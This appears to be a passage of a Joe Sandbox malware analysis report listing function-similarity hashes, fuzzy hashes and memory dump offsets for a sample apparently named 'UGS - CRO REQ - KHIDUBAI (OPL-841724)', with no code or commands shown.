                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a2d1d792cedd9db5e0fdb2b91a3fe9ae95f3feb9bbe2a789ee941a78af227bd4
                                                                                                                                                    • Instruction ID: 2684a6fd46c070e28b8cb8ae361625a847ecb0ee9f40ed1e58e4a11f5eff50f7
                                                                                                                                                    • Opcode Fuzzy Hash: a2d1d792cedd9db5e0fdb2b91a3fe9ae95f3feb9bbe2a789ee941a78af227bd4
                                                                                                                                                    • Instruction Fuzzy Hash: 99D0C97190220CAF8F10EFF5890289EBFF9EB05300B1041F6E6099B211EE729E1097D2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fc1b74b2fe464d2ed4ef3c8d3e1cf827001b76803f1fce1da54015c5d237a357
                                                                                                                                                    • Instruction ID: b458c750a68fd197f538cbae62bd9648267a7e911edaea48e05c43a3321c2269
                                                                                                                                                    • Opcode Fuzzy Hash: fc1b74b2fe464d2ed4ef3c8d3e1cf827001b76803f1fce1da54015c5d237a357
                                                                                                                                                    • Instruction Fuzzy Hash: FED0C97190220CAB8F10EFF9890189EBFF9EB45300B1041B6A60997211EE729E1057D2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5b87cd546cb3259efc90180df987cdcc7d932821919ef263d4245b814b2afcc3
                                                                                                                                                    • Instruction ID: b5409cdb9300ab9dc11fef08927eb1b5b661bc3b5501d5699b261666bbb8fce6
                                                                                                                                                    • Opcode Fuzzy Hash: 5b87cd546cb3259efc90180df987cdcc7d932821919ef263d4245b814b2afcc3
                                                                                                                                                    • Instruction Fuzzy Hash: ECD09E3114D2C44FC346CA75A8519447F699E43614719C4EED458CB163DA26D91AC751
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c5a62c43eed806ad35ca72436d40d93ae734011abfcee5960b89afcb0e749e06
                                                                                                                                                    • Instruction ID: 4e62feeadbae3b86521456ee86a3ed7e209f28c8363187b3b81d10d8559f2816
                                                                                                                                                    • Opcode Fuzzy Hash: c5a62c43eed806ad35ca72436d40d93ae734011abfcee5960b89afcb0e749e06
                                                                                                                                                    • Instruction Fuzzy Hash: 1DD05E3044D2C05FC703C778D891945BFB0AE8321430E81EFD448CF663C626981ACB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 01121f2c778aaa955698064ff843d2996bee34fc2f5530b77e7ea5e79a423cb0
                                                                                                                                                    • Instruction ID: 1b0a6f6d896694a697788613f5e5355b62e48349d74697ae87246d03dd23ea49
                                                                                                                                                    • Opcode Fuzzy Hash: 01121f2c778aaa955698064ff843d2996bee34fc2f5530b77e7ea5e79a423cb0
                                                                                                                                                    • Instruction Fuzzy Hash: 05D0C936200118BF9B04DE88DC41CAABB6EEB89660714C05FFD1887311CAB3ED22DBD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6dba878b5a73eee3cef6f9b456bbc021bb7c1d8afdcf1d6b443403d76c538ccb
                                                                                                                                                    • Instruction ID: 5e1e121f35641cc40f24ba64becc9b62de80893f07532284ae158a57632127f1
                                                                                                                                                    • Opcode Fuzzy Hash: 6dba878b5a73eee3cef6f9b456bbc021bb7c1d8afdcf1d6b443403d76c538ccb
                                                                                                                                                    • Instruction Fuzzy Hash: F0D0673510C2C56FD702D668F891B507BA8AF47208B1880DAD4588B552CA69A816C665
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 452c3b34d3ce0ec5e86880214a8f69a30da4e2c211b21d6c63ebb2f5c3ea2d00
                                                                                                                                                    • Instruction ID: a8f07239837ded97d0a2fac7f7eca2ffbb8b987193724f08d7dbd48af05ec8ca
                                                                                                                                                    • Opcode Fuzzy Hash: 452c3b34d3ce0ec5e86880214a8f69a30da4e2c211b21d6c63ebb2f5c3ea2d00
                                                                                                                                                    • Instruction Fuzzy Hash: 5ED05E3120CA845FC301C668C8518A6BFB18F9511471480AFE88AC7393D523ED16CA00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a644845e73984d7060e4181c7bdb7c9135c7c073e82535d3cbd1391fa2f5751d
                                                                                                                                                    • Instruction ID: 4bc3df595003ada9494e28eb0a5fcabee8e7e8e4f6f8a8ee4b9d5e901318ea92
                                                                                                                                                    • Opcode Fuzzy Hash: a644845e73984d7060e4181c7bdb7c9135c7c073e82535d3cbd1391fa2f5751d
                                                                                                                                                    • Instruction Fuzzy Hash: 45D0523904E2C80FC303C3B8A8A28647FB0DE4311431A80DFC488CF6A3CA62A80ECB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0b476dc9fc3f697ac181155d6f9d98fe1d0e728bda10e3f1de2026883d710f41
                                                                                                                                                    • Instruction ID: 399b19409b12bfee8db974d66aa2a96c1138129ff0f8d3e3c5f1b8eb92e7f6bb
                                                                                                                                                    • Opcode Fuzzy Hash: 0b476dc9fc3f697ac181155d6f9d98fe1d0e728bda10e3f1de2026883d710f41
                                                                                                                                                    • Instruction Fuzzy Hash: A2D012352001187F9704DA88D841CA6F76DEBC9670714C05BFC0887301CAB3ED12C7D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d7617c721d8e72f8f19018f9684544b264e2fd583036b45792b66bc3a58f3a49
                                                                                                                                                    • Instruction ID: 8f1899a6c1a1edf71edd71712792b962c50e887c957acf0b01f537667e6454dc
                                                                                                                                                    • Opcode Fuzzy Hash: d7617c721d8e72f8f19018f9684544b264e2fd583036b45792b66bc3a58f3a49
                                                                                                                                                    • Instruction Fuzzy Hash: 68D0223314C4844EC3038294DC52958BF228B41110B0CC0AFD40CCB7C3C61BD4178640
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 269a9a1e8c2e2f738feed5b6e93d4a27c782fc1a79cf3f26210a792068b47fb9
                                                                                                                                                    • Instruction ID: 1961c124d9f2ec18e01c6165d2006e376929f951008c139d244a94147c53b4b8
                                                                                                                                                    • Opcode Fuzzy Hash: 269a9a1e8c2e2f738feed5b6e93d4a27c782fc1a79cf3f26210a792068b47fb9
                                                                                                                                                    • Instruction Fuzzy Hash: BDD0A93080C2C00EC307C2A0A860A947F719B83228F2980DFC488CB3A3C623980BCB00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 32ae9c79ad03371346a72c31ef8e80d97759f982ee0b7f59afce834e3955c10b
                                                                                                                                                    • Instruction ID: 1e8ba8bc7f39d2b3421726777bf90aef29368b6c50c010edc6363866967b9253
                                                                                                                                                    • Opcode Fuzzy Hash: 32ae9c79ad03371346a72c31ef8e80d97759f982ee0b7f59afce834e3955c10b
                                                                                                                                                    • Instruction Fuzzy Hash: 6AD09E3550E3C45FD347C774E4919547FB09E4721832D85EED459CF2A3CA26A407CB15
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a1ef42c1057c001ee71fb3fa59466a7c0c648d4f59a3f9e326711018af0ffb5a
                                                                                                                                                    • Instruction ID: bfc70c2b89f75250fc3a4eef17a09ccd8bf0bf77bf04e5fb978f414f14181715
                                                                                                                                                    • Opcode Fuzzy Hash: a1ef42c1057c001ee71fb3fa59466a7c0c648d4f59a3f9e326711018af0ffb5a
                                                                                                                                                    • Instruction Fuzzy Hash: AFD0023100E554DB8A586FD5B81D4B97BBA65503067690017F557848605B3438D6F9A3
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 82db405a4b97b19513881ef2c8dabce430a9152110eece9c2c452e3459cadecf
                                                                                                                                                    • Instruction ID: ad05db37a3b79017eccbcc0d9b4b2045882d77bac24779a68683dbc64c022976
                                                                                                                                                    • Opcode Fuzzy Hash: 82db405a4b97b19513881ef2c8dabce430a9152110eece9c2c452e3459cadecf
                                                                                                                                                    • Instruction Fuzzy Hash: 4ED0C93114D2C16FC317C7B8D8A18557FB4DE9720830980EFE449CB6A3DB26A81AE791
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cc7353903f600d8263e3b0efb6129b973f8f9d10824156717ce91ca9f66aba95
                                                                                                                                                    • Instruction ID: 710e14bf313e113efe197ba763ef12abad899869c7249d50a8923ddb23502708
                                                                                                                                                    • Opcode Fuzzy Hash: cc7353903f600d8263e3b0efb6129b973f8f9d10824156717ce91ca9f66aba95
                                                                                                                                                    • Instruction Fuzzy Hash: 26D0A96500E3C09FC703C7308CA80C43F309C0B02275846CBC0E28E9E3E3A0998EEB62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fa62c3f60bd6b98288f9fa48e02fb357e219988b77cd61fc13ce8e80e3c1649f
                                                                                                                                                    • Instruction ID: f26be908c4a23b04a72b2040c9027a2e61913d1fbdec8fcbe4e9c1586bdc6d09
                                                                                                                                                    • Opcode Fuzzy Hash: fa62c3f60bd6b98288f9fa48e02fb357e219988b77cd61fc13ce8e80e3c1649f
                                                                                                                                                    • Instruction Fuzzy Hash: 31C08C212081280386052A88A8112EB328DCF86A21F00006BA109877818E541D0202E6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dbcef5c395f5c673d87ed76c55c2f1c93d814102d17bdb09fc090918b690f88a
                                                                                                                                                    • Instruction ID: 58c7e918dc9fc6e739d0296992eb27fcb8a7bf4254ad48f247067e0340e6a738
                                                                                                                                                    • Opcode Fuzzy Hash: dbcef5c395f5c673d87ed76c55c2f1c93d814102d17bdb09fc090918b690f88a
                                                                                                                                                    • Instruction Fuzzy Hash: A6C012313402095BD304CA88C842A22B3AADBC8614B14C079A808C7746DE36EC028694
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c3806d98d0b54d5d62c2c56130ade2e9dba6d1854384937c8bcc6aae3bb39db5
                                                                                                                                                    • Instruction ID: cb92636d5fef0ddf9f7151cdb3c8c381ee10a9202b273d7654d50ebb5bac7684
                                                                                                                                                    • Opcode Fuzzy Hash: c3806d98d0b54d5d62c2c56130ade2e9dba6d1854384937c8bcc6aae3bb39db5
                                                                                                                                                    • Instruction Fuzzy Hash: 59D080661055C0DFD311CE34C9596447F72DFA1604759CAEEDC458B587C726DC17C315
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dbcef5c395f5c673d87ed76c55c2f1c93d814102d17bdb09fc090918b690f88a
                                                                                                                                                    • Instruction ID: 58c7e918dc9fc6e739d0296992eb27fcb8a7bf4254ad48f247067e0340e6a738
                                                                                                                                                    • Opcode Fuzzy Hash: dbcef5c395f5c673d87ed76c55c2f1c93d814102d17bdb09fc090918b690f88a
                                                                                                                                                    • Instruction Fuzzy Hash: A6C012313402095BD304CA88C842A22B3AADBC8614B14C079A808C7746DE36EC028694
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9c533359947a8e2b2f80c5bc84dbaef60392404cd01e3e8b6cc3414158e3accd
                                                                                                                                                    • Instruction ID: e54e86835595294ae0bba1d9f800359616980eab42528124fbdb1962b577efc7
                                                                                                                                                    • Opcode Fuzzy Hash: 9c533359947a8e2b2f80c5bc84dbaef60392404cd01e3e8b6cc3414158e3accd
                                                                                                                                                    • Instruction Fuzzy Hash: 34D0C936E00628CBCB20DE44E0007FDB760FB403A5F110093CB05A7A0093349A658AD6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                    • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                                                                                    • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                    • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6b3cf73ecc0437b7ba418ab1aa0e16a313d668e98a5c47dae4f63aedb3a58e83
                                                                                                                                                    • Instruction ID: 1559b7bb1d66cdfc4324202593fed40f7269f97be06a62174427e62a94373c76
                                                                                                                                                    • Opcode Fuzzy Hash: 6b3cf73ecc0437b7ba418ab1aa0e16a313d668e98a5c47dae4f63aedb3a58e83
                                                                                                                                                    • Instruction Fuzzy Hash: 8DC00235280208AFD7109A55DC46F457B68AB15B50F554091F7045F6A1C6A2E8109A98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                    • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                                                                                    • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                    • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6b3cf73ecc0437b7ba418ab1aa0e16a313d668e98a5c47dae4f63aedb3a58e83
                                                                                                                                                    • Instruction ID: 1559b7bb1d66cdfc4324202593fed40f7269f97be06a62174427e62a94373c76
                                                                                                                                                    • Opcode Fuzzy Hash: 6b3cf73ecc0437b7ba418ab1aa0e16a313d668e98a5c47dae4f63aedb3a58e83
                                                                                                                                                    • Instruction Fuzzy Hash: 8DC00235280208AFD7109A55DC46F457B68AB15B50F554091F7045F6A1C6A2E8109A98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                    • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                                                                                    • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                    • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                    • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                                                                                    • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                    • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                    • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                                                                                    • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                    • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
